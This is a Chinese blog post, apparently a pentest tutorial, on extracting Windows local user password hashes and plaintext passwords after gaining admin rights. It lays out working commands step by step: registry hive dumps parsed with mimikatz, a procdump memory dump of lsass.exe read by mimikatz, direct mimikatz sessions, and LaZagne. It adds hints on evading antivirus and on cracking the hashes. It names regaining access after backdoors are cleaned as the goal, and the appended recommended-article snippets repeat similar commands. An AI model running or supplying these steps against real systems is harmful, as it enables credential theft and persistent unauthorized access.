内网渗透-获取WIN本地用户Hash

最新推荐文章于 2023-10-14 16:29:09 发布
最新推荐文章于 2023-10-14 16:29:09 发布
阅读量2.3k 收藏 19
点赞数 4
分类专栏: 内网渗透 文章标签: 安全 hash获取 散列值获取
本文链接:https://blog.csdn.net/weixin_43221560/article/details/109308984
版权

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

WIN本地获取Hash

win系统密码

Win系统使用LM和NTLM两种加密方法对用户的密码进行处理,
两种加密方式在这有介绍Win本地hash概念

但注意的是从win-server-2008开始默认禁止使用LM加密方式
统一使用NTLM方式进行加密处理。
2008之前的如果密码位数超过14,会使用NTLM方法加密。

为什么要获取本地hash

通常在渗透测试过程中,进行完提权之后,通常会进行权限维持,植入木马后门,或者创建一个高权限用户。
但是权限维持也有一定的时间,木马后门等被清理了之后,如果知道被攻击者的账户密码,再次拿下还不是分分钟的事。

在哪能找到

1.在win中,系统密码通常储存在SAM文件
物理路径:C:\windows\system32\config\SAM

SAM是windows系统的一个系统用户账号管理文件。 win中对用户账户的安全管理使用了安全账号管理器SAM的机制,安全账号管理器对账号的管理是通过安全标识进行的,安全标识在账号创建时就同时创建,一旦账号被删除,安全标识也同时被删除。一旦某个账号被删除,它的安全标识就不再存在了,即使用相同的用户名重建账号,也会被赋予不同的安全标识,不会保留原来的权限。
SAM 文件一旦丢失,会失去所有用户账号。

2.还有就是通过lsass.exe进程,转储内存中的密码。

lsass.exe是微软Windows系统中安全机制相关进程。主要用于本地安全和登陆策略,同时也管理IP相关安全信息。
lsass.exe造成相应的缓冲区溢出,从而从内存中读取密码。
但是,由于lsass.exe进程属于Windows系统核心进程,对lsass.exe攻击会导致服务崩溃,系统容易死机或者卡死。

几种工具和利用方式

将工具上传被攻击机,然后运行程序。

1.注册表 + mimikatz

win对用户密码生成的hash值都会储存在hklm\sam注册表中,
密匙则存放在hklm\system中。
命令行运行(管理员权限)

reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive

在这里插入图片描述

通过mimikatz工具进行提取hash
(注意:将提取出来的三个文件下载到本地,并移动到mimikatz目录下)

mimikatz.exe
lsadump::sam /sam:sam.hive /system:system.hive /security:security.hive

在这里插入图片描述
到在线hash破解网站进行破解。
https://www.objectif-securite.ch/ophcrack

成功拿到本机账户hacker密码123456
在这里插入图片描述

或者直接复制文件

C:\windows\system32\config\sam
C:\windows\system32\config\system

mimikatz.exe
lsadump::sam /sam:sam /system:system

2.Procdump + mimikatz

Procdump 是微软官方发布的一款调试工具,可以将lsass.exe 转储成 dmp 文件。
(win运行时不能复制system和sam文件,利用此方法获取系统未清理内存时的登录信息凭证。)

微软的亲儿子怎么可能被当病毒,然后利用mimikatz读取dmp中的密码。

命令行运行(管理员权限)

procdump.exe -accepteula -ma lsass.exe lsass.dmp #32位系统
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp #64位系统

在这里插入图片描述
利用mimikatz读取
(注意:将lsass.dmp文件下载到本地,并移动到mimikatz目录下)

mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

直接读取出LM,NTLM和明文密码123456
在这里插入图片描述

3.直接上传mimikatz读取密码

原理是直接上传mimikatz工具,在线读取SAM文件提取hash值
但是要进行免杀处理,并是管理员权限

mimikatz.exe
privilege::debug # 提升权限
token::elevate #假冒令牌。提升权限至 SYSTEM 权限
lsadump::sam #读取sam获取NTLM hash
###################################################################
mimikatz.exe 
privilege::debug # 提升权限
log #开启日志记录,储存在mimikatz.log文件中
sekurlsa::logonpasswords #获取明文密码和hash

在这里插入图片描述

4.LaZagne获取所有密码

一款获取win密码的神器
可以抓取 系统密码、浏览器密码、wifi 密码等等(部分需要权限)

laZagne.exe all #获取所有密码
laZagne.exe browsers #只获取浏览器记住的密码:
laZagne.exe browsers -firefox #只获取firefox记住的密码:
laZagne.exe all -oN #将输出保存到文件

在这里插入图片描述

在这里插入图片描述

5.其他工具

还有一些老牌的工具也挺好用
像pwdump8,WCE,Quarks Pwdump,GetHsahes等等。
好用是好用,但基本上传就被当病毒给干了,通过免杀啥的或许还能用,可以尝试一下。

总结

本地读取hash的关键点就是要有权限。有权限,干啥都行。
如果抓取的LM Hash为 AAD3B435B51404EEAAD3B435B51404EE
可能密码为空或LM Hash被禁用。

自己整理的工具
在这里插入图片描述
可关注微信公众号:XG小刚
回复:hash工具
在这里插入图片描述

XG小刚
关注
  • 4
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mimikatz 的使用(黄金票据的制作)
jzm__123的博客
12-18 628
在他的工作范围内,他可以获取当前windows 的密码哈希或者sid 和等来合成黄金票据的所需材料,这使我们的电脑十分危险,如果让我们的电脑遭受了他的攻击那么我们的会遭受到信息泄露,或者被注入病毒等一系列问题。孤独没有什么反义词,但他的近义词是自由,人生成功的道路上充满了孤独,那么也同样告诉你,你离成功后的自由不远了。黄金票据,打个比方,在生活中有一种非常牛的卡,一般存在于富豪手中,有了他,那么你就可以无所不能。username hacker (冒充的用户)3测试用的用户名(虚构的,或者用来冒充的)
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6576
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash
【后渗透】Mimikatz使用大全
最新发布
hacker3062的博客
10-14 1778
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
005--Hash读取与端口转发
weixin_44508748的博客
07-06 1081
test
内网渗透总结二:第二步管理员密码的明文和hash获取
yggcwhat
05-06 3838
内网渗透总结二:第二步管理员密码的明文和hash获取
读取 Windows Hash 密码两种方式
weixin_46079186的博客
12-10 936
管理员执行cmd reg save HKLM\SYSTEM C:\sys.hiv reg save HKLM\SAM C:\sam.hiv 导出注册表文件 下载mimikatz https://github.com/gentilkiwi/mimikatz/releases 配置环境变量 我们在c盘目录下,命令行直接执行 mimikatz.exe lsadump::sam /sam:sam.hiv /system:sys.hiv ...
hashcat + john-1.9.0-jumbo-1-win64
05-10
hashcat + john-1.9.0-jumbo-1-win64, 哈希运算,破解工具
获取win10的hash
01-08
get-filehash d:\module.txt -algorithm md5 也可以在cmd上破解 certutil -hashfile d:\module.txt md5 Hash算法有:MD2、MD4、MD5、SHA1、SHA256、SHA384、SHA512 PowerShell同样可以运行certutil -hashfil
hash-wasm-benchmark:Hash-wasm 基准测试应用
08-04
"hash-wasm 基准测试" 描述简单明了,表明这个项目专注于对"hash-wasm"进行性能测试,这可能是针对不同哈希函数在WebAssembly环境下的执行效率进行的一系列测试。 **标签解析:** 1. **benchmark** - 指的是性能...
hashcat-6.2.6(hash爆破工具)
10-28
内容描述:用于crypto中hash爆破的强大工具。 优势:相较于其他hash工具,具有更快的算力,使用方便简洁。 适用:适用于md5,sha256等典型hash加密方式,反推出所需的源码。
murmurhash-php:MurmurHash3PHP用户区实现
02-04
由Gary Court创建的MurmurHash3 JavaScript版本的移植( ) 安装 使用: composer require lastguest/murmurhash 用法 您可以通过Murmur类的hash3静态方法检索哈希 <?php use lastguest\ Murmur ; echo Murmur :...
使用Hash直接登录Windows(HASH传递)
weixin_30498921的博客
01-23 466
抓取windows hash 得到administrator的hash: 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF msf调用payload: use exploit/windows/smb/psexec show options set RHOST 192.168.81.129 set ...
mimikatz免杀之通过SAM和System文件抓取密码
m0_47083622的博客
04-19 8506
最近学习使用Mimikatz工具抓取Windows密码时发现Procdump、SQLDumper、DumpMinitool等一系列能导出lsass进程的工具已经被360“拉黑”了。不过还可以通过SAM和System文件抓取密码和Hash,目前测试360和火绒都不会拦截 以下为操作: 利用注册表命令将目标机的sam或者system文件导出 reg save hklm\sam sam.hive reg save hklm\system system.hive 然后将目标机上的sam.hive和syst
内网渗透体系学习4
m0_55772907的博客
10-25 898
内网
内网安全之:Windows 密码抓取
f_carey的博客
11-14 4018
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 密码抓取 1 mimikatz 抓取密码 注:在 Windows 系统中抓取 NTLM Hash 或明文密码,必须将权限提升到 System;lsass.exe 进程用于实现 Windows 的安全策略。 利用通过 SAM 和 System 文件获得 NTLM Hash gentilkiw.
获取windows用户密码——Jhon
qq_61861243的博客
10-06 2437
获取windows用户密码——Jhon
【渗透测试笔记】之【内网渗透——Windows系统散列获取与防范】
AA8j的博客
07-26 485
拓扑图 Windows系统散列获取与防范 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作。 抓取密码哈希:右键被控主机 —> Access —> Dump Hashes [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iBCl8Ihj-1627176965164)(images/2021-07-20-16-09-45.png)] [外链图片转存失败,
域渗透-域控维权
m0_58596609的博客
11-19 2062
域渗透-域控维权
Mimikatz学习笔记
SWEET0SWAT的博客
02-25 2663
使用SAM和System文件抓取密码 导出sam和system文件抓取密码 reg save hklm\sam sam.hive reg save hklm\system system.hive
Ascon-128、Ascon-128a、Ascon-HASH、Ascon-HASHa的区别
05-05
Ascon是一种轻量级的加密算法,主要应用于物联网设备和嵌入式系统中。Ascon算法包括四种变体:Ascon-128、Ascon-128a、Ascon-HASH和Ascon-HASHa,它们之间的区别如下: 1. Ascon-128和Ascon-128a:这两种变体都是用于加密和解密的。它们的区别在于Ascon-128a使用了更紧凑的S盒,从而提高了效率。Ascon-128a还引入了一个专门设计的初始化向量,以提高安全性。 2. Ascon-HASH和Ascon-HASHa:这两种变体都是用于哈希算法。它们的区别在于Ascon-HASHa引入了一个专门的密钥来增强安全性。Ascon-HASHa还使用了更紧凑的S盒,从而提高了效率。 总体来说,Ascon-128和Ascon-128a适用于加密和解密,而Ascon-HASH和Ascon-HASHa适用于哈希算法。Ascon-128a和Ascon-HASHa都引入了一些额外的安全性措施,因此它们比Ascon-128和Ascon-HASH安全。但是这些安全性措施也会导致一些额外的计算负担,因此在使用时需要权衡效率和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值